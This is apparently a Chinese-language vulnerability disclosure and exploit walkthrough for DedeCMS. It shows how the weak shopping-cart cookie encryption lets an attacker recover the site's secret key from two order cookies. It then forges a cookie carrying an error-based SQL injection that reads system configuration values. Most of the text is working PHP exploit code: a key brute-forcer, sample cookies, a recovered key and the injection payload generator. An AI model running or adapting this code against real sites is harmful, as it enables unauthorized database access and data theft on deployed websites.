www.xxx.com/plus/search.php?keyword=
在 include/shopcar.class.php中
先看一下這個shopcar類是如何生成cookie的
239 function saveCookie($key,$value)
240 {
241 if(is_array($value))
242 {
243 $value = $this->enCrypt($this->enCode($value));
244 }
245 else
246 {
247 $value = $this->enCrypt($value);
248 }
249 setcookie($key,$value,time()+36000,’/');
250 }
簡單的說,$key就是cookie的key,value就是value,enCode的作用是將array類型轉(zhuǎn)變?yōu)閍=yy&b=cc&d=know這樣的類型,關(guān)鍵是enCrypt函數(shù)
186 function enCrypt($txt)
187 {
188 srand((double)microtime() * 1000000);
189 $encrypt_key = md5(rand(0, 32000));
190 $ctr = 0;
191 $tmp = ”;
192 for($i = 0; $i < strlen($txt); $i++)
193 {
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
196 }
197 return base64_encode($this->setKey($tmp));
198 }
213 function setKey($txt)
214 {
215 global $cfg_cookie_encode;
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
217 $ctr = 0;
218 $tmp = ”;
219 for($i = 0; $i < strlen($txt); $i++)
220 {
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
223 }
224 return $tmp;
225 }
enCrypt的參數(shù)$txt 我們是可知的,返回值就是cookie的值,這個我們也是可知的
然后到了enCrypt調(diào)用 setKey時的參數(shù)$tmp,這個參數(shù)在某種意義上,我們也是可知的,因為$encrypt_key = md5(rand(0, 32000));只有32000種可能,我們可以推出32000種可能的$tmp,從而推出32000種可能的md5(strtolower($cfg_cookie_encode)),對了,忘記說了,我們的目的是推測出setKey中$encrypt_key的值,然后才能任意構(gòu)造出購物車的cookie,從推出的32000種md5(strtolower($cfg_cookie_encode)),簡單過濾掉非字母數(shù)字的key,就只剩下幾百個可能的key,然后我們再從新下一次訂單,然后再獲取幾百個可能的key,然后取交集,得到最終key,
織夢CMS漏洞dedecms漏洞 20130210 SQL注入漏洞漏洞預(yù)警
。具體代碼如下:
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
function reStrCode($code,$string)
{
$code = base64_decode($code);
$key = “”;
for($i=0 ; $i<32 ; $i++)
{
$key .= $string[$i] ^ $code[$i];
}
return $key;
}
function getKeys($cookie,$plantxt)
{
$tmp = $cookie;
$results = array();
for($j=0 ; $j < 32000; $j++)
{
$txt = $plantxt;
$ctr = 0;
$tmp = ”;
$encrypt_key = md5($j);
for($i =0; $i < strlen($txt); $i ++)
{
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
}
$string = $tmp;
$code = $cookie;
$result = reStrCode($code,$string);
if(eregi(‘^[a-z0-9]+$’,$result))
{
echo $result.”\n”;
$results[] = $result;
}
}
return $results;
}
$results1 = getKeys($cookie1,$plantxt);
$results2 = getKeys($cookie2,$plantxt);
print “\n——————–real key————————–\n”;
foreach($results1 as $test1)
{
foreach($results2 as $test2)
{
if($test1 == $test2)
{
echo $test1.”\n”;
}
}
}
?>
cookie1 和 cookie2 是我下了兩次訂單后分別生成的cookie,
plantxt可以根據(jù)頁面來自己推算,大概就是這個格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
然后推算出md5(strtolower($cfg_cookie_encode))
得到這個key之后,我們就可以構(gòu)造任意購物車的cookie
接著看
20 class MemberShops
21 {
22 var $OrdersId;
23 var $productsId;
24
25 function __construct()
26 {
27 $this->OrdersId = $this->getCookie(“OrdersId”);
28 if(empty($this->OrdersId))
29 {
30 $this->OrdersId = $this->MakeOrders();
31 }
32 }
發(fā)現(xiàn)OrderId是從cookie里面獲取的
然后
/plus/carbuyaction.php中的
29 $cart = new MemberShops();
39 $OrdersId = $cart->OrdersId; //本次記錄的訂單號
……
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE id=’$OrdersId’ LIMIT 0,1″);
接著我們就可以注入了
通過利用下面代碼生成cookie:
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
function setKey($txt)
{
global $encrypt_key;
$ctr = 0;
$tmp = ”;
for($i = 0; $i < strlen($txt); $i++)
{
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
}
return $tmp;
}
function enCrypt($txt)
{
srand((double)microtime() * 1000000);
$encrypt_key = md5(rand(0, 32000));
$ctr = 0;
$tmp = ”;
for($i = 0; $i < strlen($txt); $i++)
{
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
}
return base64_encode(setKey($tmp));
}
for($dest =0;$dest = enCrypt($txt);)
{
if(!strpos($dest,’+'))
{
break;
}
}
echo $dest.”\n”;
?>